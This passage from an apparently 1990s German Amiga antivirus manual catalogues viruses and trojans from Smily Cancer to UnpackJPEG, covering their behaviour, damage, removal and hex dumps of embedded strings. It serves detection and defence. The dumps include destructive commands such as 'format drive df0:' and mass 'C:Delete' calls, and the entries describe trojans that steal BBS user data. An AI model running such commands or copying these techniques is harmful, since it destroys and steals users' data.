  6211.    Hinweis 96-11-03: Ab KS2.04 und hoeher zerstoert das Virusteil beim
  6212.      Anlinken die Disk-Struktur (vgl. VT-Blockkette Fehlermeldung "Data-
  6213.      BlockList<>FirstDataBlock". Das gelinkte File kann dann unter KS2.04
  6214.      und hoeher von VT nur als "File defekt?" erkannt werden. Versuchen
  6215.      Sie mit einem Filemonitor ab KS2.04 so ein File anzuschauen, dann
  6216.      werden Sie eine Fehlermeldung erhalten. Wichtig: Diese Aussagen gelten
  6217.      NUR, wenn das gelinkte File unter KS2.04 oder hoeher erzeugt wurde.
  6218.      Gelinkte Files die unter KS1.2 oder KS1.3 erzeugt wurden, werden von
  6219.      VT auch unter KS2.04 und hoeher erkannt und ausgebaut, da ja die File-
  6220.      struktur in Ordnung ist.
  6221.  
  6222.    - The Smily Cancer II   Filevirus  Laenge: 4676  2x verschluesselt
  6223.       nach 1x entschluesseln mit   eori.b #$90,d1
  6224.                                    subi.b #$22,d1
  6225.       kann man am Fileende lesen:
  6226.             CENTURIONS STRIKES BACK: THE SMILY CANCER II
  6227.  
  6228.       Beim Starten des Programms wird der loadwb-Befehl simuliert und
  6229.       das Virusteil setzt sich im Speicher fest. Die Vermehrung erfolgt
  6230.       dann als Smily 1, d.h. es findet KEINE Vermehrung als Smily II
  6231.       statt. siehe oben
  6232.  
  6233.     Hinweis: Es wird ein Smily-File (Laenge 4792 Bytes, ab $200 im
  6234.          File Text zu lesen) in Deutschland weitergegeben, das
  6235.          NICHT lauffaehig ist (April 92). Dieses Prg wird von VT  NICHT
  6236.          erkannt, da keine Gefahr besteht. Lasst solche Scherze und
  6237.          verunsichert nicht die Amiga-Benutzer !!!!
  6238.     Hinweis 03.09.92: Ab VT2.44 sollten mehrere SmilyLinks ans gleiche
  6239.       File in einem Durchgang ausgebaut werden. Falls nein, melden Sie
  6240.       sich bitte. Danke
  6241.     Hinweis 16.04.93: Es ist ein Smily Clone aufgetaucht.
  6242.       Laenge: verlaengert ein File um 3916 Bytes
  6243.       FAST KEIN mit Absicht verseuchtes File war lauffaehig. Das laesst
  6244.       den Schluss zu, dass der addbuffers-befehl von Hand manipuliert
  6245.       wurde.
  6246.       VT hat die Files wieder auf die Original-Laenge verkuerzt und die
  6247.       Startup-Sequence war danach wieder lauffaehig.
  6248.       Unterschied zu Original: Der Sprung-Befehl zur Decodier-Routine
  6249.       wurde geaendert.
  6250.       weiteres Verhalten: siehe oben
  6251.     Hinweis 12.06.93: Es tauchen immer haeufiger defekte Smily-Files auf.
  6252.       VT sollte beim Ausbauversuch eine defekte Hunk-Struktur erkennen
  6253.       und das Loeschen des Files anbieten. Bitte vergessen Sie dann nicht,
  6254.       die Startup-Sequence zu ueberpruefen und bei Bedarf das unverseuchte
  6255.       Originalfile neu aufzukopieren.
  6256.     SMILY-CANCER defekt: File
  6257.       Ein Beispiel: Nach Fileheader muesste das File aus vier Hunks be-
  6258.       stehen. Jemand hat nun nach dem Virusteil das File abgeschnitten.
  6259.       Da ist dann natuerlich ein Ausbau nicht sinnvoll.
  6260.  
  6261.    - The Traveller 1.0
  6262.       KickTag, KickCheckSum, im Prg. DoIo u. $6c, immer $7F000
  6263.       abhaengig vom Zaehlerstand: Textausgabe
  6264.          roter,gruener und blauer Balken, schwarze Schrift
  6265.             NEVER HEARD OF VIRUS-PROTECTION ??? -LAMER !!!
  6266.       Vermehrung und Schaden: BB   (auch HD !!!!!!!!!)
  6267.  
  6268.    - Tick
  6269.          siehe unter Julie
  6270.  
  6271.    - TimeBomb V0.9    Trojanisches Pferd
  6272.       wird mit dem Prg. BMassacre erzeugt (da steht auch TimeBomb V0.9)
  6273.       siehe auch BB-MASSACRE
  6274.       besteht aus 2 Teilen in SubDir c und Root:
  6275.          in c: .info      = Virus   Laenge: 7840 Bytes
  6276.       in Root: pic.xx     = Zaehler (Startwert=6)  Laenge: 1 Byte
  6277.       in der 1.Zeile der startup steht: c/.info
  6278.       nicht resident, keine Vermehrungsroutine in .info
  6279.       Verhalten: vermindert bei jedem Neustart den Wert in pic.xx um 1 .
  6280.       Sobald 0 erreicht ist, wird die Disk formatiert (Track 0-159) .
  6281.       Damit der Wert in pic.xx geaendert werden kann, darf die Disk
  6282.       nicht schreibgeschuetzt sein. Falls doch, erscheint:
  6283.          User Request : Please remove write Protection and press
  6284.                         left Mouse Button to continue..
  6285.       Eine weitere Abarbeitung der startup-sequence ist ohne Oeffnung
  6286.       der Disk nicht moeglich.
  6287.       Im Cli wird immer ausgegeben:
  6288.             RAM CHECKED - NO VIRUS FOUND.
  6289.  
  6290.    - TimeBomb V0.9 Clone   Trojanisches Pferd
  6291.          Wird von VT als Timebomb erkannt.
  6292.       besteht aus 2 Teilen in SubDir c und Root:
  6293.          in c: .info      = Virus   Laenge mit PP: 1584 Bytes
  6294.       in Root: setmap     = Zaehler (Startwert=FF)  Laenge: 1 Byte
  6295.       in der 1.Zeile der startup steht: c/.info
  6296.       nicht resident, keine Vermehrungsroutine in .info
  6297.       Verhalten: vermindert bei jedem Neustart den Wert in setmap um 1 .
  6298.       Sobald 0 erreicht ist, wird die Disk formatiert (Track 0-150) .
  6299.       Textausgabe danach:
  6300.          Hey Looser ! Boot again !
  6301.       Damit der Wert in df0:setmap geaendert werden kann, darf die Disk
  6302.       nicht schreibgeschuetzt sein. Falls doch, erscheint:
  6303.          User Request : Please remove write Protection and press
  6304.                         left Mouse Button to continue..
  6305.       Eine weitere Abarbeitung der startup-sequence ist ohne Oeffnung
  6306.       der Disk nicht moeglich.
  6307.       Im Cli wird ausgegeben:
  6308.             DISC SPEEDER BY BUD usw
  6309.       VT bietet im FileTest loeschen an und sucht auch nach setmap (1Byte).
  6310.       Falls gefunden, wird auch setmap im Rootverzeichnis geloescht.
  6311.  
  6312.  
  6313.    - TimeBomb V1.0  BB-Virus
  6314.      ( verbiegt keine "bekannten" Zeiger )
  6315.      (je nach Zaehlerstand wird eigener BootBlock geschrieben,
  6316.      (( Einsprung bei #$70208))
  6317.      oder Track 80 (Directory) mit Speicherinhalt ab #$20000 ueberschrieben
  6318.          = Disk wird unlesbar !!!)
  6319.      (( Einsprung bei #$70026))
  6320.      Sichert eigenen Speicher NICHT. Kann also ueberschrieben werden !!!
  6321.      Clone: FAT 1 Virus, O.M.S.A Virus, Lame Game Virus, TAI4-Virus,
  6322.  
  6323.    - Time Bomber    Trojanisches Pferd
  6324.       wird mit dem Prg. TimeBomber erzeugt
  6325.       besteht aus 2 Teilen in RootDir:
  6326.       virustest         = Virus   Laenge: 936 Bytes
  6327.       virustest.data    = Zaehler (Startwert=5)  Laenge: 1 Byte
  6328.       in der 1.Zeile der startup steht: virustest
  6329.       nicht resident, keine Vermehrungsroutine in virustest
  6330.       Verhalten: vermindert bei jedem Neustart den Wert in virustest.data
  6331.       um 1 .Sobald 0 erreicht ist, wird die Disk formatiert.
  6332.       Damit der Wert in virustest.data geaendert werden kann, darf die
  6333.       Disk nicht schreibgeschuetzt sein. Falls doch, erscheint:
  6334.          User Request : Please remove write Protection and press
  6335.                         left Mouse Button to continue..
  6336.       Eine weitere Abarbeitung der startup-sequence ist ohne Oeffnung
  6337.       der Disk nicht moeglich.
  6338.       Im Cli wird immer ausgegeben:
  6339.             RAM checked - no virus found.
  6340.  
  6341.    - Time Bomber-Inst.    File
  6342.       Laenge gepackt:   17464 Bytes
  6343.       Laenge ungepackt: 45640 Bytes
  6344.       Programm um nach DF0: die 2 Time Bomber Files (s.o.) zu schreiben.
  6345.       Wird von selbst NICHT aktiv.
  6346.       Keine verbogenen Vektoren.
  6347.       VT bietet loeschen an.
  6348.  
  6349.    - Timer-Virus   Files
  6350.        2 Files: timer   Laenge:4812     setmap  Laenge:1712
  6351.        Verbiegt $74 (ZeroPage)  Verbiegt $74 VecPage NICHT
  6352.           (Hallo Enforcer-Freunde)
  6353.        Beim timer-File handelt es sich um das install-Programm.
  6354.        Zur Taeuschung wird ein Fenster (V1.1) geoeffnet und es erfolgt
  6355.        die Ausgabe:      Ram  ....
  6356.                          Chip ....
  6357.                          Time ....
  6358.                          Date ....
  6359.        In Wirklichkeit wird aber versucht :c/setmap und/oder :system/setmap
  6360.        zu kopieren. Die Unterverzeichnisse muessen existieren und koennen
  6361.        vom timer-Prg NICHT angelegt werden. Nachweis: z.B. snoopdos
  6362.        Das timer-File enthaelt das setmap-File uncodiert.
  6363.  
  6364.        Beim naechsten reset wird nun der falsche setmap-Befehl aufgerufen,
  6365.        wenn er in ihrer s.-seq. steht.
  6366.                      - installiert Zeichensatz
  6367.                      - verbiegt $74 auf eigene Routine
  6368.                      - oeffnet console.device
  6369.  
  6370.        $74-Routine:
  6371.                      - arbeitet am seriellen Port
  6372.                       $DFF018, $DFF019
  6373.                      - testet nach meiner Meinung eingehende Zeichen
  6374.                      - hat den execute-Befehl
  6375.                      - enthaelt eine Zeitschleife
  6376.                      - am Schluss jmp Orig.-$74
  6377.        Koennte ein Prg. sein, um in eine Mailbox einzubrechen ????
  6378.        $74-Erkennung mit VT getestet    : 29.09.92
  6379.        timer-Erkennung mit VT getestet  : 29.09.92
  6380.        setmap-Erkennung mit VT getestet : 29.09.92
  6381.        Empfehlung: loeschen Sie die beiden Files mit VT und kopieren Sie
  6382.                    bei Bedarf das setmap-File neu auf.
  6383.        Zeichen, die so im Orig_Setmap_File NICHT vorkommen:
  6384.            00004E75 72616D64 72697665 2E646576 ..Nuramdrive.dev
  6385.            69636500 636F6E73 6F6C652E 64657669 ice.console.devi
  6386.            63650000 3A646576 732F6B65 796D6170 ce..:devs/keymap
  6387.            732F6400 00000000 00000000 00000000 s/d.............
  6388.            646F732E 6C696272 61727900 00000000 dos.library.....
  6389.            .
  6390.            .
  6391.            .
  6392.            00000000 00000000 00000000 646F732E ............dos.
  6393.            6C696272 61727900 52414D3A 436F6D6D library.RAM:Comm
  6394.            616E642D 30302D54 30310000 00000000 and-00-T01......
  6395.  
  6396.  
  6397.    - TNK    noch ein SCA-Clone          08.04.92
  6398.         im BB zu lesen:
  6399.            32162054 68697320 77617320 54686520 2. This was The
  6400.            4e657720 4b696420 dc6e0000 4ef90000 New Kid .n..N...
  6401.            0000412e 544e4b21 544e4b21 544e4b21 ..A.TNK!TNK!TNK!
  6402.            544e4b21 544e4b21 544e4b21 544e4b21 TNK!TNK!TNK!TNK!
  6403.  
  6404.    - Tomates-Gentechnic-Service  = TimeBomb-BB-Clone
  6405.             nur der Text wurde veraendert
  6406.  
  6407.    - Tomates-Gentechnic-Service 2 = Coder.BB
  6408.         Wieder eine Meisterleistung. Der Text wurde geaendert.
  6409.         Lesen Sie bitte bei Coder.BB nach.
  6410.         Im BB ist zu lesen:
  6411.            546f6d61 7465732d 47656e74 6563686e Tomates-Gentechn
  6412.            69632d53 65727669 63652032 2e30202d ic-Service 2.0 -
  6413.            2d2d2054 68652042 65737420 696e2045 -- The Best in E
  6414.            75726f70 65203139 39322021 21201400 urope 1992 !! ..
  6415.               ;.......
  6416.            8059a5c9 d5cd8084 8400416e 74697669 .Y........Antivi
  6417.            7275732d 436f6465 20426567 696e2024 rus-Code Begin $
  6418.            37666130 302d59a5 c9d5cd80 84842d45 7fa00-Y.......-E
  6419.            6e642024 37666134 3020446f 6e742069 nd $7fa40 Dont i
  6420.            6e737461 6c6c2074 68697320 4d414749 nstall this MAGI
  6421.            432d424f 4f54424c 4f434b20 4265726c C-BOOTBLOCK Berl
  6422.            696e204a 756c7927 393259a5 c9d5cd80 in July'92Y.....
  6423.            84486176 65206120 676f6f64 20776179 .Have a good way
  6424.  
  6425.         Im Speicher wird mit ror.b #2,d1 und FALSCHER Laenge decodiert:
  6426.            20202020 2020746f 6d617465 732d6765       tomates-ge
  6427.            6e746563 686e6963 2d736572 76696365 ntechnic-service
  6428.            20212120 67726565 74696e67 7320746f  !! greetings to
  6429.            2065696e 732d676d 62682061 6e64206b  eins-gmbh and k
  6430.            6f626f6c 2d646174 61202121 21202056 obol-data !!!  V
  6431.  
  6432.    - TOPDOG    anderer Name: Top util  s.u.
  6433.  
  6434.    - Top util Virus  Laenge ungepackt: 2260 Bytes
  6435.      Namensbegruendung:
  6436.      Top util By Zacker of EnSoniC V1.0 ist im File zu lesen.
  6437.      Wurde mir ungepackt zugeschickt. Wird deshalb von VT nur unge-
  6438.      packt erkannt. Bleibt NICHT im Speicher, deshalb keine Speicher-
  6439.      erkennung notwendig. Von der Definition kein Virus, da keine Ver-
  6440.      mehrung. Ein Zerstoerungsfile gegen BBS gerichtet. Also fuer den
  6441.      User ohne Mail-Box ungefaehrlich. Versucht durch Cli-Ausgabe zu
  6442.      taeuschen:
  6443.              Top util By Zacker of EnSoniC V1.0
  6444.         Call Zack BBS 16.8 HST 407-232-6324 HST ONLY !!
  6445.  
  6446.     USEAGE: Top (num /ALL) <-Hfname> <-Sfname> <-Ttext>
  6447.     num : Min. megs to get on the list
  6448.     ALL : Show all users (default to BBS:User.rpt)
  6449.     -H  : Use the file name after -H as the TOP hdr
  6450.           if no -s is used default =  BBS:user.rpt
  6451.     -T  : text to be used with top dog
  6452.         : TOPDOG (I just added)
  6453.     -S  : Use the file name after -S as TOP list
  6454.  
  6455.      Schaden in Wirklichkeit:
  6456.      bbs:user.data wird mit Laenge 66 Bytes neu angelegt, d.h. ein
  6457.      altes user.data-file geht verloren:
  6458.      0000: 0CEBEAE5 EAA0F4E9 E9E9F4E7 B4A0E9F7 
  6459.      0010: EDF6E5F7 E5F7E9A0 E9F2E5F7 E7E5F7A0 
  6460.      0020: 67726577 67206565 20200A20 54686520 grewg ee  . The
  6461.      0030: 54687265 65204D75 736B6574 65657273 Three Musketeers
  6462.      0040: 200A
  6463.      Fileerkennung mit VT : 02.11.92
  6464.      Empfehlung: File einfach loeschen
  6465.  
  6466.    - Trabbi  Link  anderer Name: Hochofen  s.o.
  6467.  
  6468.    - Trainer-Trojan    File   Zerstoerung
  6469.       Filename: Trainer.exe
  6470.       Laenge gepackt: 592 Bytes
  6471.       VT bietet Loeschen an.
  6472.       Im entpackten File ist zu lesen:
  6473.                              00006262 733a636f         ..bbs:co
  6474.            6e66636f 6e666967 2e696e66 6f006262 nfconfig.info.bb
  6475.            733a7573 65722e64 61746100 6c696273 s:user.data.libs
  6476.            3a616564 6f6f722e 6c696272 61727900 :aedoor.library.
  6477.            6c696273 3a426f6f 74626c6f 636b2e6c libs:Bootblock.l
  6478.            69627261 7279006c 6962733a 61652e6c ibrary.libs:ae.l
  6479.            69627261 7279006c 6962733a 6578706c ibrary.libs:expl
  6480.            6f64652e 6c696272 61727900 6c696273 ode.library.libs
  6481.            3a46696c 6549442e 6c696272 61727900 :FileID.library.
  6482.            4c696273 3a667265 65616e69 6d2e6c69 Libs:freeanim.li
  6483.            62726172 79006c69 62733a69 66667061 brary.libs:iffpa
  6484.            7273652e 6c696272 61727900 6c696273 rse.library.libs
  6485.            3a726571 746f6f6c 732e6c69 62726172 :reqtools.librar
  6486.            79006c69 62733a74 72616e73 6c61746f y.libs:translato
  6487.            722e6c69 62726172 79006c69 62733a78 r.library.libs:x
  6488.            70727a6d 6f64656d 2e6c6962 72617279 przmodem.library
  6489.       Schaden:
  6490.         Einige Files (s.o.) sollen mit dosdelete geloescht werden.
  6491.       Versuchen Sie bei Bedarf mit DiskSalv eine Rettung.
  6492.  
  6493.  
  6494.    - Traveling Jack
  6495.       LinkVirusPrg mit variabler HunkLaenge
  6496.       verbiegt DosBase+$2E  (= dos.library-Zeiger ins ROM), nicht resetfest
  6497.       a) schreibt ein File auf Disk VIRUS.xy   Laenge immer 198 Bytes
  6498.          x u. y sind HexZahlen, die ueber $BFE801 bestimmt werden.
  6499.  
  6500.          Text in VIRUS.xy:
  6501.       The Traveling Jack....
  6502.       I'm traveling from town to town looking for respect,
  6503.       and all the girls I could lay down make me go erect.
  6504.                             -Jack, 21st of September 1990
  6505.  
  6506.       b) linkt sich an andere Prg.e
  6507.       Bedingungen:
  6508.       DOS0-Disk, Disk validated, 12 Bloecke frei auf Disk, Filelaenge
  6509.       mind. 2000 Bytes, FileName mind. 5 Zeichen, FileName enthaelt
  6510.       kein Zeichen kleiner als $40,
  6511.       kein Info.File
  6512.       Typ A:
  6513.       LinkHunkLaengenBerechnung:
  6514.       $24C + Wert aus $DFF006
  6515.       decodiert im Speicher $909+1 Bytes
  6516.       Typ B:
  6517.       LinkHunkLaengenBerechnung:
  6518.       $25B + Wert aus $DFF006
  6519.       decodiert im Speicher $945+1 Bytes
  6520.  
  6521.    - Travelling Jack 3  gibt es nicht, es handelt sich um Typ B, glauben
  6522.       Sie mir. Einige andere VirenChecker machen einen Fehler, indem sie
  6523.       die Hunklaengenaenderung nicht beachten und erkennen deshalb nur
  6524.       EINEN Typ B, obwohl mehrere moeglich sind. (Stand 28.09.91)
  6525.  
  6526.    - Trick-Gag   Empfehlung Loeschen
  6527.       anderer moeglicher Name: Shocked-Gag
  6528.       bekannter Archivname: Trick.zip   Laenge: 84606 Bytes
  6529.       Im Archiv ist zu lesen:
  6530.           00000000 0000000f 04250000 00537973 .........%...Sys
  6531.           3a53686f 636b6564 2e696666 504b0102 :Shocked.iffPK..
  6532.             ;...
  6533.           00000000 0f0464a2 00005379 733a5762 ......d...Sys:Wb
  6534.           53746172 7475702f 54726963 6b504b01 Startup/TrickPK.
  6535.             ;...
  6536.           00000000 000f0470 a3000053 79733a50 .......p...Sys:P
  6537.           5053504b 01021401 14000000 0800c4b5 PSPK............
  6538.             ;...
  6539.           5379733a 57625374 61727475 702f5472 Sys:WbStartup/Tr
  6540.           69636b2e 696e666f 504b0506          ick.infoPK..
  6541.       Beim Entpacken wird kopiert nach:
  6542.         Sys:       Shocked.iff   57694 Bytes
  6543.                    PPS           66088 Bytes
  6544.         WbStartup: Trick           328 Bytes
  6545.                    Trick.info     3619 Bytes
  6546.       Das Trick-Programm wird beim naechsten Reset aufgerufen.
  6547.       Im Programm ist zu lesen:
  6548.           42804e75 5379733a 50505320 5379733a B.NuSys:PPS Sys:
  6549.           53686f63 6b65642e 69666600          Shocked.iff.
  6550.       Mit DOS-Execute wir Sys:PPS Sys:Shocked.iff ausgefuehrt, also
  6551.       ein Bild angezeigt. Sie sehen dann in grossen Buchstaben
  6552.       Shocked. Mit der Esc-Taste koennen Sie weitermachen. Loeschen
  6553.       Sie einfach diese vier Files. Weitere Schaeden sind nicht
  6554.       bekannt.
  6555.  
  6556.    - TRIPLEX-Virus    BB    Cool, DoIo  auch KS2.04
  6557.          belegt im Speicher $800 Bytes, ist 2x im Speicher
  6558.       Vermehrung und Schaeden: BB
  6559.       VirusPrg. meldet sich NICHT
  6560.       im BB ist zu lesen:
  6561.          This nice little Virus was written in 1990  usw.
  6562.  
  6563.    - TRISECTOR 911 Virus BB   immer $7F000
  6564.       KS2.04 : nein
  6565.       fordert trackdisk.device NICHT
  6566.       KickTag, KickChecksum
  6567.       nach 1. Reset auch:
  6568.       DoIo,
  6569.       Vermehrung und Schaeden:
  6570.          BB und  $94(a6) fuer Zeitbestimmung
  6571.  
  6572.    - TRISTAR-Viruskiller V1.0
  6573.       Es ist NICHT der Original TRISTAR- BB gemeint, sondern jemand hat
  6574.       den Text in einen Target-BB  (sehr kurzer Code) eingesetzt.
  6575.       Oh, ihr Anfaenger !!   VT erkennt Target  s.o.
  6576.  
  6577.    - Trojan   BB  anderer Name: Incognito    s.o.
  6578.  
  6579.    - TROJAN 3.0  File Laenge ungepackt: 10536 Bytes
  6580.          Einbruchsprogramm gegen BBS, also fuer Normaluser ohne Mailbox
  6581.          ungefaehrlich. Empfehlung: einfach loeschen
  6582.          Versucht durch Cli-Ausgabe zu taeuschen:
  6583.  
  6584.   TROJAN KILLER V3.0  (23/8/92)
  6585.  
  6586.   Please enter the full path U have to your download dir
  6587.   < eg. BBS:warez/upload >
  6588.   The directory?:
  6589.   Checking for known trojans on harddisk...
  6590.   Report: 0 trojan(s) found'
  6591.   Checking for known trojans in memory...!
  6592.   Trojan(s) found on harddisk   : 0!
  6593.   Trojan(s) found in memory     : 0
  6594.   Please contact ->NYLONMAN<- for new trojan killers!!!
  6595.   Note: This program only works on AmiExpress 1.xx and 2.xx Press <<ENTER>>
  6596.  
  6597.     in Wirklichkeit:
  6598.         liest aus:
  6599.               BBS:user.data
  6600.         legt ab in:
  6601.               /demo99.lha
  6602.  
  6603.         liest aus:
  6604.               BBS:user.keys
  6605.         legt ab in:
  6606.               /demo98.lha
  6607.     Es handelt sich natuerlich NICHT um lha-Files. Die Files werden in dem
  6608.     Unterverzeichnis abgelegt, das Sie oben nach ?: eingegeben haben.
  6609.     Loeschen Sie bitte diese zwei "lha"-Files von Hand.
  6610.     Trojan-File-Erkennung mit VT getestet: 20.10.92
  6611.  
  6612.    - TRUSTNOONE-Trojan    Zerstoerung
  6613.          anderer moeglicher Name: visions-Trojan
  6614.          Filenamen: Visions.020  Laenge: 130048 Bytes
  6615.                     Visions.030  Laenge: 132396 Bytes
  6616.          Entpackt ist im File zu lesen:                   
  6617.             733a7379 7374656d 2f666f72 6d617420 s:system/format
  6618.             64726976 65206466 303a206e 616d6520 drive df0: name
  6619.             54525553 542d4e4f 4f4e4500 646f732e TRUST-NOONE.dos.
  6620.          oder:
  6621.             fffffffe 7379733a 73797374 656d2f66 ....sys:system/f
  6622.             6f726d61 74206472 69766520 7379733a ormat drive sys:
  6623.             206e616d 65205452 5553542d 4e4f4f4e  name TRUST-NOON
  6624.             45207175 69636b00 646f732e 6c696272 E quick.dos.libr
  6625.          Soll also df0: oder sys: formatieren. Da einmal mit quick
  6626.          formatiert wird, sollten Sie DiskSalve zur Rettung ver-
  6627.          suchen.
  6628.  
  6629.    - TTS-Virus  BB   siehe oben bei BadBytes1-Virus
  6630.  
  6631.    - TURK_V1.3      Cool, DoIo, im Speicher immer $7f000
  6632.          schreibt TURK nach $60
  6633.          Vermehrung: ueber BB
  6634.          Textausgabe (entschluesselt mit subq #6,d0) ueber DisplayAlert:
  6635.             Amiga Failure... Cause: TURK VIRUS Version 1.3!
  6636.          im BB sichtbar: TURK
  6637.  
  6638.    - TWINZ SANTA CLAUS    Coder-Clone  s.o.
  6639.          Text geaendert im BB: THE SANTA CLAUS VIRUS !!!! usw.
  6640.  
  6641.    - U.K.LamerStyle   anderer Name: Clist-Virus  s.o.
  6642.    - U.K.Lame Style   anderer Name: Clist-Virus  s.o.
  6643.  
  6644.    - UA62-ACP-Trojan
  6645.       siehe auch bei CLP-Trojan, PHA Trojan
  6646.       Gefunden in Archiv ua62.lha   Laenge: 28761 Bytes
  6647.       ZerstoerungsFile:
  6648.       Mit 3E8-Hunk und gepackt: Laenge 26868 Bytes
  6649.       Entpackt:                 Laenge 51956 Bytes
  6650.       Schadensteil ausgebaut  : Laenge 45616 Bytes
  6651.       Keine verbogenen Vektoren.
  6652.       Keine Vermehrung
  6653.       Namensbegruendung: siehe Auszug
  6654.       Schaden:
  6655.       Schreibt in alle Files in S: egal ob Data oder Prg. einen Text.
  6656.       Ed-startup vorher:
  6657.            73692030 20203120 2250726f 6a656374 si 0  1 "Project
  6658.            220a7369 20312020 3220224f 70656e2e ".si 1  2 "Open.
  6659.            2e2e2020 20204553 436f7022 20226f70 ..    ESCop" "op
  6660.            203f202f 46696c65 3a202f22 0a736920  ? /File: /".si
  6661.            32202034 0a736920 33202032 20225361 2  4.si 3  2 "Sa
  6662.       Ed-startup nachher:
  6663.            64522e57 486f206f 4620414c 46202841 dR.WHo oF ALF (A
  6664.            4c69454e 204c6946 4520466f 524d2920 LiEN LiFE FoRM)
  6665.            57695348 45532055 2041204d 45525259 WiSHES U A MERRY
  6666.            20582d4d 41532165 3a202f22 0a736920  X-MAS!e: /".si
  6667.            32202034 0a736920 33202032 20225361 2  4.si 3  2 "Sa
  6668.       Manchmal wurden die Files auch mit dem Text versehen und der Rest
  6669.       mit Speichermuell gefuellt. Dies war abhaengig vom Prozessortyp.
  6670.       Ed-startup nachher 2:
  6671.            64522e57 486f206f 4620414c 46202841 dR.WHo oF ALF (A
  6672.            4c69454e 204c6946 4520466f 524d2920 LiEN LiFE FoRM)
  6673.            57695348 45532055 2041204d 45525259 WiSHES U A MERRY
  6674.            20582d4d 4153214b 200b0200 00fc2640  X-MAS!K .....&@
  6675.            221b0c41 03ec6650 48416138 2409524b "..A..fPHAa8$.RK
  6676.       Die Files werden unbrauchbar und VT bietet loeschen an. Die
  6677.       Wirkungsweise ist also aehnlich wie bei CLP-Trojan.
  6678.       Fileerkennung:
  6679.       VT erkennt 3E8-Hunk und bietet Ausbau an.
  6680.       Nach dem Ausbau erkennt VT Powerpacker. Bitte entpacken Sie das
  6681.       File mit Powerpacker. Sie stellen dann fest, dass es sich um
  6682.       einen 4EB9-4EF9-Link handelt. VT erkennt jetzt beim Filetest
  6683.       UA62-ACP-Trojan und bietet Ausbau an (hoffe ich). Das entstehende
  6684.       File hat etwas mit BBS zu tun. Mehr kann ich dazu nicht sagen,
  6685.       da ich das Mailbox-Prg. nicht habe. Ich bekomme dann die Meldung:
  6686.       acp.info nicht gefunden oder tooltype NODES fehlen usw. . Sind Sie
  6687.       mit dem Prg. vorsichtig. Es koennte noch ein Trojan im Prg. sein !
  6688.  
  6689.    - UF-Virus   anderer Name: UltraFox  s.u.
  6690.  
  6691.    - Uhr-BB  Virus      Cool DoIo $6c
  6692.         Speicherlage: abhaengig vom Inhalt $4e(a6) minus $800
  6693.         Fordert trackdisk.device NICHT
  6694.         KS2.04: Nein, da Routine Speicher schon verseucht $6c+1 auf
  6695.             kleiner $FC testet.
  6696.         BB wird decodiert mit eor.b d0,d2 usw.
  6697.         Namensbegruendung: Da kein Text gefunden wurde, wurde ein
  6698.         Schadensfall (s.u.) fuer den Namen herangezogen.
  6699.         Vermehrung: BB
  6700.         - Test ob BB schon verseucht
  6701.         - Neue Codierung mit eor.b d2,d1 (Dx zu Decodierung anders).
  6702.           Der Startwert von d2 wird mit $BFE801 festgelegt.
  6703.         Schaeden:
  6704.         Enthaelt mehrere Zaehlzellen. Eine Zaehlzelle wird auf 0-6
  6705.         getestet.
  6706.           z.B. Wert 2
  6707.           addq.b #3,D80002    (Namensbegruendung!!!)
  6708.           Addiere 3 Sekunden. Diese Speicherstelle stimmt aber nach
  6709.           meinem Wissensstand nur fuer den A2000A . Fuer den A2000B
  6710.           waere die richtige Speicherstelle $DC0000 .
  6711.           z.B. Wert 3
  6712.           erhoehe VHPOSR um $300
  6713.           z.B. Wert 4
  6714.           Wartezaehlschleife mit $B000
  6715.           z.B. Wert 5
  6716.           Mauspos -$605
  6717.           usw.
  6718.  
  6719.    - ULDV8   kein Fastmem, KickTag, KickCheckSum, BeginIo, IntVec 5
  6720.          im BB sichtbar: ULDV8
  6721.          fordert trackdisk.device
  6722.          Vermehrung:BB
  6723.  
  6724.    - ULog V1.8   siehe bei Devil_11_B.Door
  6725.  
  6726.    - ULOG.X     BBS-Bomb   siehe oben bei scan.x
  6727.  
  6728.    - UltraFox       Cool, im Prg. DoIo, FastMem ja,
  6729.          kennzeichnet eigenen Speicher NICHT als belegt
  6730.          fordert trackdisk.device nicht
  6731.          Vermehrung: ueber BB
  6732.          im Speicher immer ab $7eb00
  6733.          Zaehlzelle groesser $f = Textausgabe, Graphikroutine
  6734.          Hintergrund dunkelblau, Balken hellblau, Schrift gelb.
  6735.          Greetings from ULTRAFOX of Aust.
  6736.  
  6737.    - Umyj Dupe   nur KS1.2, da absoluter DoIo-ROM-Einsprung
  6738.          KickTag, KickCheckSum, DoIo, immer ab $7F800
  6739.          Fordert trackdisk.device nicht !!!
  6740.          Schaeden und Vermehrung:
  6741.          Bootblock
  6742.          Schreibt in Block 880 (ist nur bei DD-Disk der RootBlock)
  6743.             Umyj Dupe   usw.
  6744.          DisplayAlert:
  6745.             Umyj Dupe   usw.
  6746.  
  6747.    - Unkown-Virus   BB
  6748.         Stand: 23.08.94
  6749.         Einige AntiVirusPrge erkennen einen Unkown-Virus. ( (1) oder (2) )
  6750.         Das stimmt NICHT.
  6751.         VT erkennt Noboot (seit 02.11.90 !!!!)
  6752.         Lesen Sie bitte nach bei VT-andere.BB unter Noboot. Danke
  6753.         Vielleicht aendern die anderen AntiVirusProgrammee die Meldung
  6754.         beim naechsten Update.
  6755.  
  6756.    - UNLZX-Trojan   siehe bei GoTcHa-Trojan
  6757.  
  6758.    - UnpackJPEG-Trojan     Zerstoerung
  6759.          Verbogene Vektoren: keine
  6760.          Nicht Resetfest
  6761.          Filename: UnpackJPEG       27856 Bytes
  6762.          VT bietet nur Loeschen an
  6763.          Am Ende des Files ist zu lesen:
  6764.            33393230 62000000 002d433a 52756e20 3920b....-C:Run
  6765.            3e4e494c 3a20433a 44656c65 7465203e >NIL: C:Delete >
  6766.            4e494c3a 20424253 3a4d4158 73424253 NIL: BBS:MAXsBBS
  6767.            2e436f6e 66696700 00000014 4465636f .Config.....Deco
  6768.            64696e67 20746f20 5359533a 542e2e20 ding to SYS:T..
  6769.            0000001f 433a5275 6e203e4e 494c3a20 ....C:Run >NIL:
  6770.            433a4465 6c657465 203e4e49 4c3a2053 C:Delete >NIL: S
  6771.            3a233f00 0000001f 433a5275 6e203e4e :#?.....C:Run >N
  6772.            494c3a20 433a4465 6c657465 203e4e49 IL: C:Delete >NI
  6773.            4c3a2043 3a233f00 00000023 4a504547 L: C:#?....#JPEG
  6774.            20486561 64657220 666f756e 64206f6e  Header found on
  6775.            2066696c 65206043 4a532e4a 50472700  file `CJS.JPG'.
  6776.            00000026 433a5275 6e203e4e 494c3a20 ...&C:Run >NIL:
  6777.            433a4465 6c657465 203e4e49 4c3a2042 C:Delete >NIL: B
  6778.            42533a54 6578742f 233f0000 00184578 BS:Text/#?....Ex
  6779.            65637574 696e6720 4a504547 20766965 ecuting JPEG vie
